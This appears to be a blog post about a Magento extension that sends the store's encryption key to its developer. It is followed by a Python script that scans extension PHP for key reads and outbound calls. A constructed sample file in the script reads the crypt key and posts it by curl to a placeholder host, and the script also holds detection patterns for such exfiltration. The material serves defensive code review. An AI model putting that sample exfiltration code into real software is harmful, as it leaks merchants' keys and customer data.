Never Explicitly Trust Software Because It Is Open-Source

One of the major ideas behind open-source projects is that letting anyone who wants to read a project's source code do so should make bugs and security weaknesses easy to find. While this did not work so well for OpenSSL and the various bugs exposed in it recently, I do have an example where it worked extremely well.

Magento is an eCommerce platform with two separate editions. One is the completely open-source Community Edition, free as in beer. The other is the somewhat expensive Enterprise Edition. A large community of Magento developers creates extensions, or add-ons, for both editions.

One of these “Magento developers” is a company whose products I’d never use. They create a CMS add-on for Magento that has an evil feature. Many current extensions “phone home” to their developer’s servers to report which sites are using them, among other bits of information. What makes this “open source” extension’s “phoning home” so insidious is that part of the information it sends to its developer’s servers is the private encryption key that the Magento installation uses to encrypt user passwords, among other things.

That’s right, an open-source Magento extension is collecting private encryption keys and sending them to the extension developer.

While the “developer” of this extension claims this was all to track unauthorized usage of their extension, that response should not make you feel any better about their bad software. If you look at the Magento Stack Exchange profile of the supposed “developer”, there is no contact information listed, or even a website for the extension. If you dig a bit deeper and look at the developer’s website, you will be unable to find any way to contact the developer other than the contact form on the site. This developer does not even give a hint as to what country they are based in, other than the fact that they process payments in euros. To top it all off, the developer also does not disclose any contact information in the registration of their domain. They seem quite private and secretive for a company that creates open-source extensions for Magento.

The lesson here is that before using any software, open source included, you should weigh the security risks it poses and address them appropriately. In the case of a Magento extension like this one, which has the potential to expose customer data, potentially even credit card information, you should have a trusted developer review the entire codebase of any third-party extension before you install it on your site.
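A code review of the kind recommended above can be given a head start with a simple static triage pass over the extension's PHP sources. The script below is an added example, not code from this post or from Magento: it looks for the two ingredients of the behaviour described earlier, reads of the installation's encryption key and outbound network calls, and ranks any file that contains both for manual review first. The key-access patterns assume Magento 1 conventions (the key lives in app/etc/local.xml under global/crypt/key, reached through Mage::getConfig()); the pattern lists are assumptions to be extended for your own codebase, and the sample extension files are constructed for the example.

```python
"""Static triage of a third-party Magento extension for key-exfiltration patterns.

Added example, not code from the post or from Magento. It scans PHP sources for
reads of the installation's encryption key and for outbound network calls, and
flags files that do both so a reviewer reads them first. Sample extension
sources are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Ways Magento 1 code reaches the crypt key (assumed pattern set; extend as needed).
KEY_ACCESS = [
    re.compile(r"global/crypt/key"),
    re.compile(r"local\.xml"),
    re.compile(r"getEncryptionKey|getCryptKey", re.IGNORECASE),
]

# PHP primitives and Magento/Zend HTTP clients that can send data off-host.
NETWORK_EGRESS = [
    re.compile(r"\bcurl_(init|exec|setopt)\b"),
    re.compile(r"\bfsockopen\s*\("),
    re.compile(r"\bfile_get_contents\s*\(\s*['\"]https?://"),
    re.compile(r"\b(Varien|Zend)_Http_Client\b"),
    re.compile(r"\bmail\s*\("),
]


@dataclass
class Finding:
    path: str
    key_lines: list = field(default_factory=list)     # line numbers touching the key
    egress_lines: list = field(default_factory=list)  # line numbers with network calls

    @property
    def severity(self) -> str:
        # Key access and egress in the same file is the combination to read first.
        if self.key_lines and self.egress_lines:
            return "high"
        if self.key_lines or self.egress_lines:
            return "review"
        return "none"


def scan_source(path: str, source: str) -> Finding:
    """Record which lines of one PHP file match the key-access and egress patterns."""
    finding = Finding(path)
    for lineno, line in enumerate(source.splitlines(), 1):
        if any(p.search(line) for p in KEY_ACCESS):
            finding.key_lines.append(lineno)
        if any(p.search(line) for p in NETWORK_EGRESS):
            finding.egress_lines.append(lineno)
    return finding


def triage_extension(files: dict) -> list:
    """Scan every file (path -> source) and return findings, most severe first."""
    order = {"high": 0, "review": 1, "none": 2}
    findings = [scan_source(path, src) for path, src in files.items()]
    return sorted(findings, key=lambda f: (order[f.severity], f.path))


# Constructed sample extension (hypothetical vendor and hostnames, not a real product).
SAMPLE_EXTENSION = {
    "app/code/community/Acme/Cms/Helper/License.php": """<?php
class Acme_Cms_Helper_License extends Mage_Core_Helper_Abstract
{
    public function check()
    {
        $client = new Varien_Http_Client('https://license.example.invalid/check');
        $client->setParameterPost('domain', Mage::getBaseUrl());
        return $client->request('POST')->getBody();
    }
}
""",
    "app/code/community/Acme/Cms/Model/Observer.php": """<?php
class Acme_Cms_Model_Observer
{
    public function onInit()
    {
        $key = (string)Mage::getConfig()->getNode('global/crypt/key');
        $ch = curl_init('https://license.example.invalid/register');
        curl_setopt($ch, CURLOPT_POSTFIELDS, array('k' => $key));
        curl_exec($ch);
    }
}
""",
    "app/code/community/Acme/Cms/Block/Page.php": """<?php
class Acme_Cms_Block_Page extends Mage_Core_Block_Template {}
""",
}

if __name__ == "__main__":
    for f in triage_extension(SAMPLE_EXTENSION):
        print(f"{f.severity:6} {f.path} key={f.key_lines} egress={f.egress_lines}")
```

Run against a real extension, the input dict would be built by walking its directory and reading each `.php` file. The point of the ranking is triage, not a verdict: the License helper is flagged for review because it calls home at all, which is exactly the "phoning home" the post describes, while the Observer is ranked high because the same file reads the crypt key and sends data out. A human reviewer still has to read the flagged files to confirm what is actually transmitted.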

To prevent security breaches, an ounce of prevention is worth a pound of cure.
